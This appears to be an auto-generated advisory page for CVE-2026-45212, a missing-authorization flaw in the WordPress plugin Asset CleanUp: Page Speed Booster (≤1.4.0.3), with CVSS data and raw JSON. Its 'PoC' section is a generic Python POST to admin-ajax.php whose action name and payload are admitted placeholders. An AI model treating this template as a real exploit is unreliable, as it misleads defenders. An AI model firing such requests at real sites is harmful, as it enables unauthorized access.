Security Vulnerability Report
中文
CVE-2026-45212 CVSS 5.3 MEDIUM

CVE-2026-45212

Published: 2026-05-12 11:16:21
Last Modified: 2026-05-12 14:03:53

Description

Missing Authorization vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster wp-asset-clean-up allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Asset CleanUp: Page Speed Booster: from n/a through <= 1.4.0.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Asset CleanUp: Page Speed Booster <= 1.4.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-45212 Proof of Concept # Target: Asset CleanUp: Page Speed Booster <= 1.4.0.3 # Description: Exploits missing authorization to perform unauthorized actions. target_url = "http://example.com/wp-admin/admin-ajax.php" # The specific 'action' parameter depends on the vulnerable endpoint disclosed in technical details payload = { "action": "wp_asset_cleanup_unauthorized_action", "data": "exploit_data" } try: response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Potential vulnerability triggered. Check response.") print(response.text[:200]) else: print("[-] Request failed or denied.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45212", "sourceIdentifier": "[email protected]", "published": "2026-05-12T11:16:20.610", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster wp-asset-clean-up allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Asset CleanUp: Page Speed Booster: from n/a through <= 1.4.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-asset-clean-up/vulnerability/wordpress-asset-cleanup-page-speed-booster-plugin-1-4-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}